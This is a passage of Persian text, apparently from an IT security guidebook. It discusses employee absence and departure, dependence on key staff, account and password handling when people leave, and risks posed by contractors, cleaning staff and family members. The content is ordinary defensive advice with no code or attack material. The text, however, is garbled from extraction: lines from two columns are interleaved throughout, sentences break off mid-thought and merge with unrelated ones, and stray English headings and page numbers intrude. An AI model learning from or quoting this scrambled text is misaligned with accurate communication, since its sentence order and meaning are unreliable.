‫ﻧﻔﺮ ﻗﺒﻠﻲ ﺷﻮﺩ ‪ -‬ﺭﺍ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﻣﺮﺗﻜﺐ ﻛﺎﺭﻫـﺎﻱ ﻣﻤﻨﻮﻋـﻪ ﺷـﻮﺩ؛ ﻭ ﺍﻳـﻦ ﺩﺭﺣـﺎﻟﻲ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻫﻴﭽﻜﺲ ﺟﺰ ﺧﻮﺩ ﺍﻭ ﮔﺰﺍﺭﺷﺎﺕ ﺑﺎﺯﺑﻴﻨﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻳﻦ ﻛﺎﺭﻫـﺎ ﺭﺍ‬
‫ﻏﻴﺒﺖ ﻭ ﺗﺮﻙ ﺷﻐﻞ‬ ‫ﻧﻤﻲﺧﻮﺍﻧﺪ ﻭ ﻟﺬﺍ ﻧﺎﻓﺮﻣﺎﻧﻲ ﻭﻱ ﺑﺼﻮﺭﺕ ﻣﺨﻔﻲ ﺑﺎﻗﻲ ﻣـﻲﻣﺎﻧـﺪ ﻭ‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻓﺮﺍﺩ ﺑﺎ ﻣﻴﻞ ﻭ ﺍﺭﺍﺩﺓ ﺷﺨﺼﻲ ﺧﻮﺩ )ﻣﺜﻞ ﭘﻴﺸﻨﻬﺎﺩﻫﺎﻱ‬ ‫ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﺑﺎﺯ ﻫﻢ ﺗﻜﺮﺍﺭ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺑﻬﺘﺮ ﺷﻐﻠﻲ( ﻭ ﮔﺎﻫﻲ ﺑﺼﻮﺭﺕ ﻏﻴﺮﺩﺍﻭﻃﻠﺒﺎﻧـﻪ )ﻣﺜـﻞ ﻭﻗـﻮﻉ ﻣـﺮﮒ ﻳـﺎ‬
‫ﺁﺳﻴﺒﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ( ﻳﻚ ﻛﺎﺭ ﺭﺍ ﺗﺮﻙ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻛﻮﺗﺎﻫﺘﺮ‬ ‫ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻛﻠﻴﺪﻱ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬
‫ﺯﻣﺎﻧﻲ ﻧﻴﺰ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺍﻓﺮﺍﺩ ﺑﻪ ﻣﺴﺎﻓﺮﺕ ﻣﻲﺭﻭﻧﺪ ﻭ ﻳـﺎ ﺑـﺪﻻﻳﻞ‬ ‫ﻫﻴﭽﻜﺲ ﺩﺭ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﻧﺒﺎﻳـﺪ ﻏﻴﺮﻗﺎﺑـﻞ ﺟـﺎﻳﮕﺰﻳﻨﻲ ﺑﺎﺷـﺪ‬
‫ﺧﺎﻧﻮﺍﺩﮔﻲ ﻭ ﺷﺨﺼﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﭼﻨﺪ ﺭﻭﺯ ﺍﺯ ﺍﺩﺍﺭﻩ ﻏﻴﺒﺖ‬ ‫ﭼﺮﺍﻛﻪ ﻫﻴﭻ ﺍﻧﺴﺎﻧﻲ ﺟﺎﻭﺩﺍﻧﻪ ﻭ ﻫﻤﻴﺸﮕﻲ ﻧﻴﺴﺖ‪ .‬ﺍﮔﺮ ﺑﻘﺎﻱ ﻳـﻚ‬
‫ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﺎﻳـﺪ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺍﻗـﺪﺍﻣﺎﺕ ﻭ‬ ‫ﺳﺎﺯﻣﺎﻥ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻋﻤﻠﻜﺮﺩ ﺭﻭﺯﺍﻧﺔ ﻳﻚ ﻛﺎﺭﻣﻨـﺪ ﻛﻠﻴـﺪﻱ ﺑﺎﺷـﺪ‪،‬‬
‫ﺭﻭﺍﻟﻬﺎ ﺑﺮﺍﻱ ﮔﺮﺩﺵ ﻛﺎﺭ ﺩﺭ ﺷﺮﺍﻳﻂ ﻏﻴﺒﺖ ﻳﺎ ﺗﺮﻙ ﺷﻐﻞ ﺗﻌﺮﻳـﻒ‬ ‫ﺑﺪﻭﻥ ﺷﻚ ﺁﻥ ﺳﺎﺯﻣﺎﻥ ﺑﺎ ﻣﺨﺎﻃﺮﻩ ﻣﻮﺍﺟﻪ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ‬
‫ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﺠﻤﻮﻋﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﻣﺮﺍﺣﻠﻲ ﭼـﻮﻥ ﺗﻌﻠﻴـﻖ‬ ‫ﺍﻣﻨﻴﺖ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻣـﻮﺍﻗﻌﻲ ﭼـﻮﻥ ﺑﻴﻤـﺎﺭﻱ ﻳـﺎ ﺍﺧـﺮﺍﺝ‬
‫ﺣﺴﺎﺑﻬﺎ )ﺍﻟﺒﺘﻪ ﻧـﻪ ﺩﺭ ﻣـﻮﺭﺩ ﻏﻴﺒـﺖ(‪ ،‬ﺗﺨـﺼﻴﺺ ﻛﺎﺭﻫـﺎﻱ ﻓـﺮﺩ ﺑـﻪ‬ ‫ﻧﺎﮔﻬﺎﻧﻲ ﺍﻓﺮﺍﺩ ﻛﻠﻴـﺪﻱ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﻃﺮﺣﻬـﺎﻱ ﻣﻜﺘـﻮﺑﻲ ﺩﺍﺷـﺘﻪ‬
‫ﻛﺎﺭﻛﻨــﺎﻥ ﺩﻳﮕــﺮ‪ ،‬ﺗﻐﻴﻴــﺮ ﺭﻣــﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺣــﺴﺎﺱ‪ ،‬ﺑﺮﺭﺳــﻲ‬ ‫ﺑﺎﺷﻨﺪ ﻭ ﺩﺭ ﻋﻤﻞ ﻧﻴﺰ ﺍﺯ ﺁﻥ ﻃﺮﺣﻬﺎ ﺑﻬﺮﻩ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺩﺭ ﻳﻚ ﻣﻮﺭﺩ ﻛﻪ ﮔﺰﺍﺭﺵ ﺁﻥ ﺑﺪﺳﺖ ﻣﺎ ﺭﺳﻴﺪﻩ‪ ،‬ﻳﻚ ﺷﺮﻛﺖ ﺑـﺎ‬
‫‪98‬‬ ‫‪Management Information Systems‬‬
‫ﺣﺪﻭﺩ ‪ ۱۰۰‬ﻛﺎﺭﻣﻨـﺪ ﺑـﻴﺶ ﺍﺯ ‪ ۱۰‬ﺳـﺎﻝ ﻭﻗـﺖ ﺻـﺮﻑ ﺗـﺪﻭﻳﻦ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٦٤‬‬

‫ﻫﻤﺴﺮﺍﺷﺎﻥ ﺩﺭ ﭘﻴﻮﻧﺪ ﺯﻧﺎﺷﻮﻳﻲ‪ ،‬ﺩﻳﺴﻜﻬﺎ ﺭﺍ ﻣـﻮﺭﺩ ﻭﺍﺭﺳـﻲ ﻗـﺮﺍﺭ‬ ‫ﺻﻨﺪﻭﻗﻬﺎﻱ ﭘﺴﺖ ﺻﻮﺗﻲ؛ ﻭ ﻳﺎ ﻗﻄﻊ ﺩﺳﺘﺮﺳـﻴﻬﺎ ﺑـﻪ ﺗﻤـﺎﻡ ﺍﻳـﻦ‬
‫ﺩﺍﺩﻩﺍﻧــﺪ‪ .‬ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ ﺗﺠــﺎﺭﻱ ﻧﻴــﺰ ﮔﺰﺍﺭﺷــﺎﺗﻲ ﺩﺭ ﻣــﻮﺭﺩ‬ ‫ﺳﻴﺴﺘﻤﻬﺎ ﺑﺎﺷﺪ‪.‬‬
‫ﻧﻈﺎﻓﺘﭽﻲﻫﺎ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﻮﻗﺖ ﺩﻓﺘـﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺣـﻴﻦ‬ ‫ﺩﺭ ﺑﺮﺧﻲ ﻣﺤﻴﻄﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻛﺎﺭﻫـﺎ ﺗـﺄﺛﻴﺮﺍﺕ‬
‫ﺧﺮﺍﺑﻜﺎﺭﻱ ﻳﺎ ﺟﺎﺳﻮﺳﻲ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺮﻛﺖ ﺩﺳﺘﮕﻴﺮ ﺷﺪﻩﺍﻧﺪ‪.‬‬ ‫ﻼ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺩﺭ ﻳـﻚ ﺩﺍﻧـﺸﮕﺎﻩ‪،‬‬ ‫ﮔﺴﺘﺮﺩﻩﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﺷﻤﺎ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﭘﺪﺭ ﻭ ﻣﺎﺩﺭ ﺧﻮﺩ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ‬ ‫ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﻓﺎﺭﻍﺍﻟﺘﺤﺼﻴﻞ ﺍﺟﺎﺯﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺗﺎ ﻣﺎﻫﻬﺎ ﻳﺎ ﺳﺎﻟﻬﺎ‬
‫ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﭼﻪ ﻛﺴﻲ ﺣﻖ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﺮﻛﺖ‬ ‫ﺑﻌﺪ ﺍﺯ ﻓﺎﺭﻍﺍﻟﺘﺤﺼﻴﻠﻲ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ )ﻣـﺜ ﹰ‬
‫ﻼ‬
‫ﺷﻤﺎ ﺩﺍﺭﺩ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺎﺷـﻴﺪ‪ .‬ﺑﺎﺯﺩﻳﺪﻛﻨﻨـﺪﮔﺎﻥ‪ ،‬ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ‬ ‫ﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺍﺳـﺎﺗﻴﺪ( ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﺩﺍﺭﺍﺕ ﻧﻴـﺰ ﺍﮔـﺮ ﻳﻜـﻲ ﺍﺯ‬
‫ﺗﻌﻤﻴﺮﺍﺕ‪ ،‬ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ‪ ،‬ﻓﺮﻭﺷﻨﺪﮔﺎﻥ‪ ،‬ﻭ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ ﻫﻤﮕﻲ ﻣﻤﻜﻦ‬ ‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭ ﺳﻔﺮ ﺑﺎﺷﺪ ﻳﺎ ﺑﻪ ﺧﺎﻃﺮ ﺑﻴﻤﺎﺭﻱ ﻏﻴﺒﺖ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ‬
‫ﺍﺳﺖ ﺑﻪ ﺩﻓﺘﺮ ﻛﺎﺭ ﻭ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﻣﻮﻗﺘﻲ ﻳﺎ ﻧﻴﻤﻪﺩﺍﺋﻤﻲ‬ ‫)ﺍﻟﺒﺘﻪ ﺑﻪ ﻣﺪﺕ ﭼﻨﺪ ﺭﻭﺯ(‪ ،‬ﺣـﺴﺎﺑﻬﺎﻱ ﺍﻭ ﻧﺒﺎﻳـﺪ ﻣـﺴﺪﻭﺩ ﻭ ﺭﻣﺰﻫـﺎﻱ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺒﻴﻨﻴﺪ ﻫﻤﺔ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗـﺮﺍﺭ‬ ‫ﻋﺒﻮﺭﺵ ﻧﺒﺎﻳﺪ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ‪.‬‬
‫ﺩﺍﺩﻩﺍﻳﻢ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳـﻦ ﺍﻓـﺮﺍﺩ ﺻـﺪﻕ ﻛﻨﻨـﺪ‪ .‬ﺩﺭ‬ ‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﻗﻊ ﺗـﺮﻙ ﺷـﻐﻞ ﺑـﺴﻴﺎﺭ ﻧﺎﮔﻬـﺎﻧﻲ ﻭ ﻏﻴﺮﻣﻨﺘﻈـﺮﻩ‬
‫ﭘﺎﻳــﺎﻥ ﺍﺯ ﻳــﺎﺩ ﻧﺒﺮﻳــﺪ ﻛــﻪ ﻫــﻴﭽﻜﺲ ﺍﺯ ﺑﻴــﺮﻭﻥ ﺍﺩﺍﺭﻩ ﻧﺒﺎﻳــﺪ ﺑــﻪ‬ ‫ﺍﺳــﺖ‪ .‬ﺩﺭ ﺍﻳــﻦ ﺷــﺮﺍﻳﻂ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﻓــﺮﺩﻱ ﺩﺭ ﻣﺤــﻞ ﻛــﺎ ﹺﺭ‬
‫ﻲ ﻧﺎﻣﺤﺪﻭﺩ‬ ‫ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪﺍﻱ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜ ﹺ‬ ‫ﻛﺎﺭﻣﻨﺪﻱ ﻛﻪ ﺗﺮﻙ ﺷﻐﻞ ﻛﺮﺩﻩ ﺣﺎﺿﺮ ﺷﻮﺩ ﺗﺎ ﺍﺯ ﺗﻌﻮﻳﺾ ﻗﻔﻠﻬـﺎ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬ ‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﺪ ﻭ ﻳﻚ ﻣﺄﻣﻮﺭ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺎ ﺟﻌﺒﻪﺍﻱ ﺣﺎﻭﻱ‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺳﻮﺍﺑﻖ ﻛﺎﺭﻱ ﺁﻧﻬﺎ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ‬ ‫ﻭﺳﺎﻳﻞ ﺷﺨﺼﻲ ﻭﻱ ﻛﻪ ﺩﺍﺧﻞ ﻛﺸﻮﻱ ﻣﻴﺰ ﻛﺎﺭﺵ ﺑﻮﺩﻩﺍﻧـﺪ ﺑـﻪ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬ ‫ﻼ ﺣـﺬﻑ ﺷـﺪﻩ‪ ،‬ﺗﻤـﺎﻣﻲ‬ ‫ﺑﺪﺭﻗﺔ ﺍﻭ ﺑﺮﻭﺩ‪ .‬ﺣﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺍﻭ ﻗـﺒ ﹰ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﻴﺴﺘﻢ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧﺪ‪ ،‬ﻭ ﺗﻠﻔﻨﻬﺎﻱ ﺩﻓﺘﺮ ﻭﻱ ﻧﻴـﺰ‬
‫ﻣﺘﺼﺪﻳﺎﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ؛‬ ‫•‬
‫ﺩﻳﮕﺮ ﻭﺻﻞ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺷﻜﻞ ﻣـﺪﻳﺮﻳﺖ ﺟـﺪﺍﺋﻲ‪ ٩٩‬ﺩﺭ ﺻـﻨﺎﻳﻊ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ﻣﻮﻗﺖ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺳﺘﺮﺳـﻲ‬ ‫•‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﺴﻴﺎﺭ ﻣﻌﻤﻮﻝ ﺍﺳﺖ ﻭ ﺑﺨﺸﻲ ﺍﺯ ﻣﺸﺎﻏﻞ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺩﺍﺭﻧﺪ؛‬
‫ﻻ ﻛﺎﺭﻣﻨـﺪﺍﻧﻲ ﻫـﺴﺘﻨﺪ‬‫ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﻛﺎﺭﻛﻨﺎﻥ ﺍﻳﻦ ﺑﺨﺶ ﻣﻌﻤﻮ ﹰ‬
‫ﭘﺮﺳﻨﻞ ﺗﻌﻤﻴﺮﺍﺕ ﻭ ﻧﻈﺎﻓﺖ؛‬ ‫•‬
‫ﻛﻪ ﺍﺯ ﺭﻭﻱ ﻣﻴﻞ ﺧﻮﺩﺷﺎﻥ ﻭ ﺑﺮ ﺣـﺴﺐ ﻗﺮﺍﺭﺩﺍﺩﻫـﺎﻳﻲ ﺍﺳـﺘﺨﺪﺍﻡ‬
‫ﻧﮕﻬﺒﺎﻧﺎﻥ ﺍﻣﻨﻴﺘﻲ؛‬ ‫•‬
‫ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺫﻛﺮ ﺷﺪﻩ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﺴﺌﻮﻝ ﺍﻧﺠـﺎﻡ‬
‫ﻧﺎﻣﻪﺭﺳﺎﻧﻬﺎ ﻭ ﭘﺮﺳﻨﻞ ﺑﺨﺶ ﺗﺪﺍﺭﻛﺎﺕ ﻛﻪ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎ‬ ‫•‬
‫ﭼﻨﻴﻦ ﺍﻗﺪﺍﻣﺎﺗﻲ ﺷﻮﻧﺪ‪ .‬ﺗﺤﺖ ﻫﺮ ﺷﺮﺍﻳﻄﻲ ﺍﺯ ﺩﺍﻧﺶ ﻋﺮﻓﻲ ﺧـﻮﺩ‬
‫ﺩﺳﺘﺮﺳﻲ ﻣﻌﻤﻮﻟﻲ ﻳﺎ ﺑﺪﻭﻥ ﻧﻈﺎﺭﺕ ﺩﺍﺭﻧﺪ؛‬
‫ﻣﺸﺎﻭﺭﺍﻥ؛‬ ‫•‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺷﻤﺎ ﺑﺎﻳﺪ ﺩﻗﻴﻘﹰﺎ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺖ ﺩﺳﺘﺮﺳﻲ‬
‫ﺑﺎﻳﺪ ﭼﻪ ﺑﺎﺷﺪ ﻭ ﺁﻧﺮﺍ ﺑﻮﺿﻮﺡ ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﺍﻓﺮﺍﺩ ﻣـﺴﺌﻮﻝ ﺩﺭ‬
‫ﺣﺴﺎﺑﺮﺳﺎﻥ‪ ،‬ﻣﻤﻴﺰﻫﺎ‪ ،‬ﻭ ﺳﺎﻳﺮ ﭘﺮﺳﻨﻞ ﺑﺨﺶ ﻣﺎﻟﻲ‪.‬‬ ‫•‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻴﺎﻥ ﻛﻨﻴﺪ‪.‬‬
‫ﺗﻤﺎﻣﻲ ﻛﺎﺭﻛﻨﺎﻧﻲ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧـﺪ ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺍﻣﻨﻴﺖ ﻭ ﭘﻴـﺸﮕﻴﺮﻱ ﺍﺯ ﺧـﺴﺎﺭﺗﻬﺎ ﺁﻣﻮﺯﺷـﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﺑﺒﻴﻨﻨـﺪ ﻭ‬ ‫ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺳﺎﻳﺮ ﻛﺎﺭﻛﻨﺎﻥ‬
‫ﻣﻄﺎﻟﺐ ﺁﻣﻮﺯﺷﻲ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﺮﺍﻳﺸﺎﻥ ﺗﻜﺮﺍﺭ ﺷﻮﺩ‪ .‬ﭘﺮﺳـﻨﻞ‬
‫ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﺩﺭ ﺟﺮﻳﺎﻥ ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎ ﻭ ﻧﻴـﺰ‬
‫ﻫﻤﻮﺍﺭﻩ ﻣﻨﺎﻓﻊ ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺩﺭﻧﻈﺮ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻳـﺎ ﺑـﻪ‬
‫ﺟﺮﻳﻤﻪﻫﺎﻱ ﻧﻘﺾ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺧﺴﺎﺭﺗﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﺑﻲﺗﻮﺟﻬﻲ ﻧﺸﺎﻥ‬
‫ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺍﺯ ﺟﺎﻧﺐ ﺧﺎﻧﻮﺍﺩﺓ ﺧﻮﺩﺗﺎﻥ ﻣﺘﻮﺟﻪ ﺷﻤﺎ ﺍﺳـﺖ ﺭﺍ ﺍﺯ‬ ‫ﺩﻫﻨﺪ‪ .‬ﮔﺰﺍﺭﺷـﺎﺕ ﺯﻳـﺎﺩﻱ ﺩﺭ ﻣـﻮﺭﺩ ﻭﻗـﻮﻉ ﭼﻨـﻴﻦ ﺍﺗﻔﺎﻗـﺎﺗﻲ ﺩﺭ‬
‫ﻳﺎﺩ ﻧﺒﺮﻳﺪ‪ .‬ﺧﻮﺍﻩ ﺩﺭ ﻣﻨﺰﻝ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣـﺸﺘﺮﻙ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ‬ ‫ﻣﺤﻴﻄﻬﺎﻱ ﺧـﺎﻧﻮﺍﺩﮔﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ :‬ﻫﻤﺒﺎﺯﻳﻬـﺎﻱ ﻛﻮﺩﻛـﺎﻥ ﻛـﻪ‬
‫ﺍﻋﻀﺎﻱ ﺧﺎﻧﻮﺍﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﺧﻮﺍﻩ ﻛﻮﺩﻛﺎﻧﺘﺎﻥ ﺭﺍ ﮔﻬﮕﺎﻩ ﺑﺮﺍﻱ‬ ‫ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛـﺮﺩﻩﺍﻧـﺪ ﻭ ﻳـﺎ ﺍﻓـﺮﺍﺩ‬
‫ﺑﺎﺯﺩﻳﺪ ﺑﻪ ﺍﺩﺍﺭﻩ ﺑﺒﺮﻳﺪ‪ ،‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳـﺖ ﻛـﻪ ﺁﻧﻬـﺎ‬ ‫ﻣﺘﺄﻫﻠﻲ ﻛﻪ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻭ ﺁﮔـﺎﻩ ﺷـﺪﻥ ﺍﺯ ﺧﻴﺎﻧـﺖ‬
‫ﺑﺪﺍﻧﻨﺪ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭﺳﻴﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺑﺎﺯﻱ‬
‫ﻧﻴﺴﺖ‪ .‬ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﻳﺎﺩ ﺑﮕﻴﺮﻧﺪ ﻛﻪ ﺑﻪ ﺩﺳﺘﮕﺎﻫﻬﺎ ﻭ ﻭﺳﺎﻳﻞ ﺣﺴﺎﺱ‬
‫‪99‬‬ ‫‪Separation Management‬‬
‫‪١٦٥‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺗﺠﺎﺭﻱ ﺩﺳﺖ ﻧﺰﻧﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺤﺎﻓﻈﻬـﺎﻱ‬


‫ﻧﻤﺎﻳﺸﮕﺮ ﻣﺠﻬﺰ ﺑﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ‪ ،‬ﺍﻗـﺪﺍﻡ ﭘﻴـﺸﮕﻴﺮﺍﻧﺔ ﻣﻨﺎﺳـﺒﻲ‬
‫ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ‪ .‬ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺑـﻪ ﺍﻋـﻀﺎﻱ ﺧـﺎﻧﻮﺍﺩﺓ ﺧـﻮﺩ‬
‫ﺑﻴﺎﻣﻮﺯﻳﺪ ﻛﻪ ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ ﻣﺤـﻴﻂ ﻛـﺎﺭ ﻭ ﺗﺠـﺎﺭﺕ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﻤﺎ ﺑﺎ ﻛﺴﻲ ﺻﺤﺒﺖ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫‪١٦٧‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻣﻬﺎﺭﺗﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺁﻧﻬﺎ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬


